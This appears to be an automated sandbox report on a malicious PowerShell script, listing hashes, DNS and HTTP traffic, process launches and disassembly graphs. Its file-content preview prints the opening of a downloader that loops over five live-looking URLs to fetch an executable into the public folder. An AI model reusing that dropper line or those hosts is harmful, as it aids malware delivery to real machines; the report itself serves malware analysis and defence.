                                              Preview:...................................FL..................F.".. ......Yd....| h.<..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...qIyb.<..].*h.<......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BvYuC..........................d...A.p.p.D.a.t.a...B.V.1.....vYsC..Roaming.@......EW)BvYsC..........................6f..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BvYpC............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BvYpC..........................cN..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BvYpC....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BvYpC....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BvYwC.....0..........

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8AUBHWJE11D5AVD5AP59.temp

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6222
                                              Entropy (8bit):3.7124798944453925
                                              Encrypted:false
                                              SSDEEP:96:pRKqCKP8tkvhkvCCt53gOYoahHDegOYoaiHDU:pRKEPS53gOzmegOz7U
                                              MD5:EEB519AF466377D546D03374F4E4AB42
                                              SHA1:E547CFF5186D96B41767C71DB582389A6986F567
                                              SHA-256:1F28D323BD98E7F324C706D25D793EB400825FAC96BC172618C514919FC2B51F
                                              SHA-512:2D22E0A22B965F71F9A8FBD1CA1AAB70E382150573B18A6AF9A3B58A4E66B124FA1C820928EE53465D04D5D445B0E488F7E4045569D05C67A76AB4173CE9A232
                                              Malicious:false
                                              Preview:...................................FL..................F.".. ......Yd....| h.<..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...qIyb.<..].*h.<......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BvYuC..........................d...A.p.p.D.a.t.a...B.V.1.....vYsC..Roaming.@......EW)BvYsC..........................6f..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BvYpC............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BvYpC..........................cN..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BvYpC....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BvYpC....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BvYwC.....0..........

                                              Static File Info

                                              General

                                              File type:ASCII text, with very long lines (64682), with CRLF, LF line terminators
                                              Entropy (8bit):5.710219694700802
                                              TrID:
                                                File name:ps1001.ps1
                                                File size:804'722 bytes
                                                MD5:5996b2aa1d6b234a48ed62f1ecaae159
                                                SHA1:4f6e56e34d7da66cb1f9b9ebc707f7fd01764352
                                                SHA256:100a4c16630356774d7ebee6681d40279fcb4ceabccf194d371af739ca98ce53
                                                SHA512:6d74c8bd7f52fedf55068a58cca93ce30582517a40d556b07c3f3ec3d5f17283b2cc7852601331bd77d1a3fd8f09b2f3cc6ebd7a2c6fa8a34cee45363eb80d0f
                                                SSDEEP:12288:8ppYXT60Mv5a8kebcetZ3Aq74GA19Td1JplTmu5jP+D/43EeI1gZEtd14Q2f3Nug:fXWZ5Pbcq92zjP+sjI10+r4Q21ug
                                                TLSH:000523108B2C9D9F0AFC5678446A1F4F12FDCEC82484ECFAD294795F2E9EF394246658
                                                File Content Preview:$qzi=new-object net.webclient;$mrs='http://habarimoto24.com/nh@http://fenett2018.com/dobgx@http://eastend.jp/bl5kfa@http://bemnyc.com/u8erijeq@http://abakus-biuro.net//a9zqemm'.split('@');$wai = '509';$kqz=$env:public+'\'+$wai+'.exe';foreach($cme in $mrs)

                                                File Icon

                                                Icon Hash:3270d6baae77db44

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 22, 2024 09:27:50.733648062 CET4970480192.168.2.8162.43.104.133
                                                Nov 22, 2024 09:27:50.853300095 CET8049704162.43.104.133192.168.2.8
                                                Nov 22, 2024 09:27:50.853487015 CET4970480192.168.2.8162.43.104.133
                                                Nov 22, 2024 09:27:50.854479074 CET4970480192.168.2.8162.43.104.133
                                                Nov 22, 2024 09:27:50.974134922 CET8049704162.43.104.133192.168.2.8
                                                Nov 22, 2024 09:27:52.323499918 CET8049704162.43.104.133192.168.2.8
                                                Nov 22, 2024 09:27:52.323522091 CET8049704162.43.104.133192.168.2.8
                                                Nov 22, 2024 09:27:52.323534966 CET8049704162.43.104.133192.168.2.8
                                                Nov 22, 2024 09:27:52.323731899 CET4970480192.168.2.8162.43.104.133
                                                Nov 22, 2024 09:27:52.473551035 CET4970580192.168.2.8198.185.159.145
                                                Nov 22, 2024 09:27:52.593065977 CET8049705198.185.159.145192.168.2.8
                                                Nov 22, 2024 09:27:52.593185902 CET4970580192.168.2.8198.185.159.145
                                                Nov 22, 2024 09:27:52.593318939 CET4970580192.168.2.8198.185.159.145
                                                Nov 22, 2024 09:27:52.712846994 CET8049705198.185.159.145192.168.2.8
                                                Nov 22, 2024 09:27:53.691771984 CET8049705198.185.159.145192.168.2.8
                                                Nov 22, 2024 09:27:53.691807985 CET8049705198.185.159.145192.168.2.8
                                                Nov 22, 2024 09:27:53.691863060 CET4970580192.168.2.8198.185.159.145
                                                Nov 22, 2024 09:28:00.337393045 CET4970480192.168.2.8162.43.104.133
                                                Nov 22, 2024 09:28:00.337466002 CET4970580192.168.2.8198.185.159.145
                                                Nov 22, 2024 09:28:00.457313061 CET8049704162.43.104.133192.168.2.8
                                                Nov 22, 2024 09:28:00.457803011 CET8049705198.185.159.145192.168.2.8
                                                Nov 22, 2024 09:28:00.457896948 CET4970480192.168.2.8162.43.104.133
                                                Nov 22, 2024 09:28:00.461260080 CET4970580192.168.2.8198.185.159.145

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 22, 2024 09:27:49.264837027 CET6415253192.168.2.81.1.1.1
                                                Nov 22, 2024 09:27:50.241478920 CET53641521.1.1.1192.168.2.8
                                                Nov 22, 2024 09:27:50.429930925 CET5831453192.168.2.81.1.1.1
                                                Nov 22, 2024 09:27:50.572686911 CET53583141.1.1.1192.168.2.8
                                                Nov 22, 2024 09:27:50.583877087 CET6044053192.168.2.81.1.1.1
                                                Nov 22, 2024 09:27:50.725601912 CET53604401.1.1.1192.168.2.8
                                                Nov 22, 2024 09:27:52.332421064 CET5787053192.168.2.81.1.1.1
                                                Nov 22, 2024 09:27:52.472224951 CET53578701.1.1.1192.168.2.8
                                                Nov 22, 2024 09:27:53.693840027 CET6165053192.168.2.81.1.1.1
                                                Nov 22, 2024 09:27:53.834863901 CET53616501.1.1.1192.168.2.8
                                                Nov 22, 2024 09:28:00.337373972 CET5372853192.168.2.81.1.1.1
                                                Nov 22, 2024 09:28:00.477123976 CET53537281.1.1.1192.168.2.8

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 22, 2024 09:27:49.264837027 CET192.168.2.81.1.1.10xa217Standard query (0)habarimoto24.comA (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:50.429930925 CET192.168.2.81.1.1.10x41baStandard query (0)fenett2018.comA (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:50.583877087 CET192.168.2.81.1.1.10x5bfcStandard query (0)eastend.jpA (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:52.332421064 CET192.168.2.81.1.1.10x20bStandard query (0)bemnyc.comA (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:53.693840027 CET192.168.2.81.1.1.10x4021Standard query (0)abakus-biuro.netA (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:28:00.337373972 CET192.168.2.81.1.1.10x2c35Standard query (0)yourmother4cancer.infoA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 22, 2024 09:27:50.241478920 CET1.1.1.1192.168.2.80xa217Server failure (2)habarimoto24.comnonenoneA (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:50.572686911 CET1.1.1.1192.168.2.80x41baName error (3)fenett2018.comnonenoneA (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:50.725601912 CET1.1.1.1192.168.2.80x5bfcNo error (0)eastend.jp162.43.104.133A (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:52.472224951 CET1.1.1.1192.168.2.80x20bNo error (0)bemnyc.com198.185.159.145A (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:52.472224951 CET1.1.1.1192.168.2.80x20bNo error (0)bemnyc.com198.49.23.144A (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:52.472224951 CET1.1.1.1192.168.2.80x20bNo error (0)bemnyc.com198.49.23.145A (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:52.472224951 CET1.1.1.1192.168.2.80x20bNo error (0)bemnyc.com198.185.159.144A (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:27:53.834863901 CET1.1.1.1192.168.2.80x4021Name error (3)abakus-biuro.netnonenoneA (IP address)IN (0x0001)false
                                                Nov 22, 2024 09:28:00.477123976 CET1.1.1.1192.168.2.80x2c35Name error (3)yourmother4cancer.infononenoneA (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • eastend.jp
                                                • bemnyc.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.849704162.43.104.133804640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 09:27:50.854479074 CET66OUTGET /bl5kfa HTTP/1.1
                                                Host: eastend.jp
                                                Connection: Keep-Alive
                                                Nov 22, 2024 09:27:52.323499918 CET1236INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 08:27:52 GMT
                                                Content-Type: text/html
                                                Content-Length: 2814
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Last-Modified: Tue, 25 Jul 2023 10:28:06 GMT
                                                ETag: "afe-6014d2fcf5ab8"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14
                                                Nov 22, 2024 09:27:52.323522091 CET1236INData Raw: 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20
                                                Data Ascii: px; margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                Nov 22, 2024 09:27:52.323534966 CET587INData Raw: 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 62 61 73 65 22 3e 0a 20 20 20 20 3c 68 31 3e 3c 73 70 61 6e 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20
                                                Data Ascii: dy><div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.849705198.185.159.145804640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 09:27:52.593318939 CET68OUTGET /u8erijeq HTTP/1.1
                                                Host: bemnyc.com
                                                Connection: Keep-Alive
                                                Nov 22, 2024 09:27:53.691771984 CET1236INHTTP/1.1 400 Bad Request
                                                Cache-Control: no-cache, must-revalidate
                                                Content-Length: 2061
                                                Content-Type: text/html; charset=UTF-8
                                                Date: Fri, 22 Nov 2024 08:27:53 UTC
                                                Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                Pragma: no-cache
                                                Server: Squarespace
                                                X-Contextid: NGvXrWLg/0U7RAisU
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span {
                                                Nov 22, 2024 09:27:53.691807985 CET1105INData Raw: 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a
                                                Data Ascii: margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body { font-family: "


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:1
                                                Start time:03:27:45
                                                Start date:22/11/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1"
                                                Imagebase:0x7ff6cb6b0000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:03:27:45
                                                Start date:22/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:03:27:57
                                                Start date:22/11/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"
                                                Imagebase:0x7ff66bc30000
                                                File size:2'759'232 bytes
                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:03:27:58
                                                Start date:22/11/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4568.tmp" "c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP"
                                                Imagebase:0x7ff79e0b0000
                                                File size:52'744 bytes
                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:2.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:3
                                                  Total number of Limit Nodes:0
                                                  execution_graph 5661 7ffb4b2bc45d 5662 7ffb4b2bc49b CreateProcessA 5661->5662 5664 7ffb4b2bc80f 5662->5664

                                                  Executed Functions

                                                  Function 00007FFB4B2BC41E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 470COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483067437.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b2b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: h\_H
                                                  • API String ID: 0-4283719453
                                                  • Opcode ID: 8d110f4fe11ca0951c13c1a678509cbd166fb7ae7d0649cbaa124a78d7286800
                                                  • Instruction ID: e0f00c97b0b85a4ada2b64eaa20ec5875bdd7ee50a162fb0f858bd5055eac089
                                                  • Opcode Fuzzy Hash: 8d110f4fe11ca0951c13c1a678509cbd166fb7ae7d0649cbaa124a78d7286800
                                                  • Instruction Fuzzy Hash: 3BE1C37051CA8D4FEB65EF28C8467E97BE1FB59310F04426EE84DC7291DF74A9818B82
                                                  Function 00007FFB4B2BC45D Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 448processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483067437.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b2b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: h\_H
                                                  • API String ID: 963392458-4283719453
                                                  • Opcode ID: 52e9162455794343e0ab4ce95224fc8715e28dfb5c448eb603b3bbf8d342ed02
                                                  • Instruction ID: 9c521088e7d6767fa9b68e469b1222aa3b51047420384f18e74e5064c0a477f7
                                                  • Opcode Fuzzy Hash: 52e9162455794343e0ab4ce95224fc8715e28dfb5c448eb603b3bbf8d342ed02
                                                  • Instruction Fuzzy Hash: 2FE1D27051CA8D4FDB65EF28C8467E57BE1FB59310F04426EE84DC7292DF74A9818B82
                                                  Function 00007FFB4B3816AD Relevance: .5, Instructions: 523COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 94 7ffb4b3816ad-7ffb4b3816b1 95 7ffb4b3816b2-7ffb4b3816b7 94->95 96 7ffb4b3816f9-7ffb4b381724 95->96 97 7ffb4b3816b9-7ffb4b3816d3 95->97 99 7ffb4b381725-7ffb4b38173f 96->99 97->99 100 7ffb4b3816d5-7ffb4b3816f0 97->100 102 7ffb4b38197a-7ffb4b3819a9 99->102 103 7ffb4b381745-7ffb4b38174f 99->103 100->95 107 7ffb4b3816f2-7ffb4b3816f3 100->107 120 7ffb4b3819ab-7ffb4b3819b1 102->120 121 7ffb4b3819b5-7ffb4b3819f9 102->121 105 7ffb4b381751-7ffb4b38175f 103->105 106 7ffb4b381769-7ffb4b38176f 103->106 105->106 115 7ffb4b381761-7ffb4b381767 105->115 110 7ffb4b38190f-7ffb4b381919 106->110 111 7ffb4b381775-7ffb4b381778 106->111 107->103 108 7ffb4b3816f5-7ffb4b3816f7 107->108 108->96 113 7ffb4b38192c-7ffb4b381977 110->113 114 7ffb4b38191b-7ffb4b38192b 110->114 116 7ffb4b38178f-7ffb4b381793 111->116 117 7ffb4b38177a-7ffb4b381783 111->117 113->102 115->106 116->110 119 7ffb4b381799-7ffb4b3817d0 116->119 117->116 135 7ffb4b3817d2-7ffb4b3817f2 119->135 136 7ffb4b3817f4 119->136 120->121 137 7ffb4b381a00-7ffb4b381a0f 121->137 138 7ffb4b3817f6-7ffb4b3817f8 135->138 136->138 140 7ffb4b381a1a-7ffb4b381a2b 137->140 138->110 141 7ffb4b3817fe-7ffb4b381801 138->141 149 7ffb4b381a2d 140->149 150 7ffb4b381a34-7ffb4b381a43 140->150 143 7ffb4b381818 141->143 144 7ffb4b381803-7ffb4b381816 141->144 145 7ffb4b38181a-7ffb4b38181c 143->145 144->145 145->110 148 7ffb4b381822-7ffb4b381825 145->148 151 7ffb4b38183c-7ffb4b381840 148->151 152 7ffb4b381827-7ffb4b381830 148->152 149->150 153 7ffb4b381a4c-7ffb4b381a5b 150->153 154 7ffb4b381a45 150->154 151->110 161 7ffb4b381846-7ffb4b381880 151->161 152->151 155 7ffb4b381aad-7ffb4b381ae4 153->155 156 7ffb4b381a5c-7ffb4b381a78 153->156 154->153 169 7ffb4b381ae5-7ffb4b381b00 155->169 163 7ffb4b381a7a-7ffb4b381a80 156->163 164 7ffb4b381a93 156->164 179 7ffb4b381882-7ffb4b38188f 161->179 180 7ffb4b381899-7ffb4b38189f 161->180 167 7ffb4b381a82-7ffb4b381a92 163->167 168 7ffb4b381a9b-7ffb4b381aac 163->168 164->169 170 7ffb4b381a95-7ffb4b381a97 164->170 167->164 168->155 170->168 179->180 186 7ffb4b381891-7ffb4b381897 179->186 182 7ffb4b3818a1-7ffb4b3818b9 180->182 183 7ffb4b3818bb-7ffb4b3818c1 180->183 182->183 184 7ffb4b3818dd-7ffb4b3818e3 183->184 185 7ffb4b3818c3-7ffb4b3818db 183->185 189 7ffb4b3818ea-7ffb4b3818f2 184->189 185->184 186->180 193 7ffb4b3818fa-7ffb4b3818ff 189->193 194 7ffb4b3818f4-7ffb4b3818f8 189->194 195 7ffb4b381900-7ffb4b38190e 193->195 194->195
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2483934729.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7ffb4b380000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c42c44bb46ccfaf8fbe42310a06659ec51d6a35192fd725d044b21b43d8dcf68
                                                  • Instruction ID: 92626b2b28879e5dc39dacd215542a75637164440ff0037fb7937dcdd93630ae
                                                  • Opcode Fuzzy Hash: c42c44bb46ccfaf8fbe42310a06659ec51d6a35192fd725d044b21b43d8dcf68
                                                  • Instruction Fuzzy Hash: E6F126A290EFC60FEB56AB3998651757FE1EF4A210B0840FED18DC70A3DD186C168393
                                                  Function 00007FFB4B384435 Relevance: .4, Instructions: 447COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 197 7ffb4b384435-7ffb4b384439 198 7ffb4b38443a-7ffb4b38443f 197->198 199 7ffb4b384481-7ffb4b3844ab 198->199 200 7ffb4b384441-7ffb4b38445a 198->200 201 7ffb4b3844ad-7ffb4b3844c4 199->201 200->201 202 7ffb4b38445d-7ffb4b384478 200->202 205 7ffb4b38472c-7ffb4b3847eb 201->205 206 7ffb4b3844ca-7ffb4b3844cb 201->206 202->198 207 7ffb4b38447a-7ffb4b38447b 202->207 208 7ffb4b3844cd-7ffb4b3844d4 206->208 207->208 209 7ffb4b38447d-7ffb4b38447f 207->209 210 7ffb4b3844ed-7ffb4b3844f2 208->210 211 7ffb4b3844d6-7ffb4b3844e3 208->211 209->199 214 7ffb4b3846d0-7ffb4b3846da 210->214 215 7ffb4b3844f8-7ffb4b3844fb 210->215 211->210 219 7ffb4b3844e5-7ffb4b3844eb 211->219 217 7ffb4b3846dc-7ffb4b3846e8 214->217 218 7ffb4b3846e9-7ffb4b384729 214->218 220 7ffb4b384512 215->220 221 7ffb4b3844fd-7ffb4b384510 215->221 218->205 219->210 224 7ffb4b384514-7ffb4b384516 220->224 221->224 224->214 227 7ffb4b38451c-7ffb4b384550 224->227 238 7ffb4b384552-7ffb4b384565 227->238 239 7ffb4b384567 227->239 242 7ffb4b384569-7ffb4b38456b 238->242 239->242 242->214 243 7ffb4b384571-7ffb4b384579 242->243 243->205 245 7ffb4b38457f-7ffb4b384589 243->245 246 7ffb4b38458b-7ffb4b3845a3 245->246 247 7ffb4b3845a5-7ffb4b3845b5 245->247 246->247 247->214 250 7ffb4b3845bb-7ffb4b3845ec 247->250 250->214 257 7ffb4b3845f2-7ffb4b38461e 250->257 262 7ffb4b384620-7ffb4b384647 257->262 263 